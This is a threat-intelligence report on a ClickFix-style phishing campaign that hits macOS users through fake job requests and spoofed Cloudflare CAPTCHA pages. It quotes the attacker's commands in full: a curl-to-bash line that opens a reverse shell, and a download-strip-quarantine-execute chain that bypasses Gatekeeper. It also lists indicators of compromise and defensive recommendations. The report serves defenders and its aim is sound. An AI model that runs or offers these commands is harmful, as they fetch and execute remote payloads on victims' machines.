June 2025 - Social Engineering Meets Shell Script Malware

In April 2025, our team began tracking a sophisticated social engineering campaign patterned after the ClickFix Malware attacks against macOS users via phishing links disguised as legitimate business requests - specifically in the form of job applications targeting experienced medical professionals.

The campaign used cloned Cloudflare browser verification pages to deliver shell script malware. The investigation, dubbed Operation L2J4, revealed a broader infrastructure likely controlled by a financially motivated threat actor group with a LinkedIn presence and network of shell companies revealed after an investigation into their incorporation data and other public corporate documents/lack thereof.

Tactics, Techniques, and Procedures (TTPs):

• Primary Malicious Domain: security-check-l2j4[.]com
• Pretexting (Social Engineering): Lures victims with Canva links delivered by private message on LinkedIn under the pretext of a job application.
• Fake CAPTCHA Challenge: Spoofs Cloudflare's browser check interface, instructing victims to click a checkbox (Important to note this challenge does not appear every time you navigate to the website, which increases the appearance of legitimacy to the victim).
• Terminal Command Execution: After checkbox interaction, users are instructed to copy/paste a Terminal command under the guise of verification which then creates a reverse shell on the victim's machine.

/bin/bash -c "$(curl -fsSL https://security-check-l2j4.com/verify.sh)"

• Payload Obfuscation: Command is base64-encoded and decoded in-browser via JavaScript.

• macOS-Specific Evasion: Secondary payload (update) downloaded via:

  • curl -o /tmp/update https://security-check-l2j4.com/update &&
    xattr -c /tmp/update &&
    chmod +x /tmp/update &&
    /tmp/update

• Bypasses Gatekeeper: Uses xattr -c to remove quarantine flags and execute unsigned code.

Shared Infrastructure Insight: All three domains resolve to the same IP address: 82.180.172.175, which is hosted by Hostinger in Phoenix, Arizona. Hostinger is a low-cost hosting provider that allows up to 25 domains per plan and offers free website migration services — a setup ideal for threat actors looking to rotate infrastructure and maintain continuity despite takedown attempts. This shared infrastructure strongly suggests centralized control and supports the hypothesis of a coordinated operation originating from or facilitated by the same actor. The websites additionally link to one another at key places from the user interface, further establishing their role as infrastructure in this attack pattern.

Cloudflare Obfuscation Observed: As of the most recent DNS resolution, security-check-l2j4.com resolves to the Cloudflare IP address 162.159.36.12, as well as additional Cloudflare endpoints 104.21.15.248 and 172.67.165.88. This suggests the domain is actively protected by Cloudflare’s CDN, WAF, and Load Balancer services, which obscure the origin server’s IP.

Notably, Cloudflare has flagged the domain as a suspected phishing site, and traffic is actively filtered on both port 443 (HTTPS) and port 80 (HTTP). TLS certificate data shows the site was issued certificates by Cloudflare and Google Trust Services on the same day the domain was registered. Despite this, the domain remains reachable and is still fronted by Cloudflare edge infrastructure. Port 80 is open and may be useful in future misconfiguration discovery attempts.

Efforts to discover the true origin IP are ongoing using passive DNS, certificate transparency logs, and subdomain enumeration.

Timeline:

• April 14–17: Initial phishing domains discovered; Canva pages linked to credential harvesting.
• April 17: Shell script uncovered and analyzed.
• April 18: security-check-l2j4.com payloads begin returning 404 errors, indicating potential actor

Recommendations:

• Block all traffic to security-check-l2j4.com and related infrastructure
• Warn users against executing terminal commands from web-based prompts
• Monitor /tmp/ directories for unsigned binaries or execution events
• Deploy EDR rules to flag use of xattr -c and suspicious curl-based downloads
• Monitor and restrict access to shared IPs associated with actor infrastructure (e.g., 82.180.172.175)
• Investigate potential methods to discover origin IPs behind Cloudflare masking (e.g., certificate transparency logs, misconfigured DNS)

Conclusion:

Operation L2J4 highlights the evolving nature of social engineering campaigns - blending user psychology, legitimate-looking infrastructure, and platform-specific malware to achieve their goals. The combination of cloned interfaces, actor-controlled infrastructure, and shell-based payloads represents a growing threat, especially for organizations relying on user trust and macOS endpoints.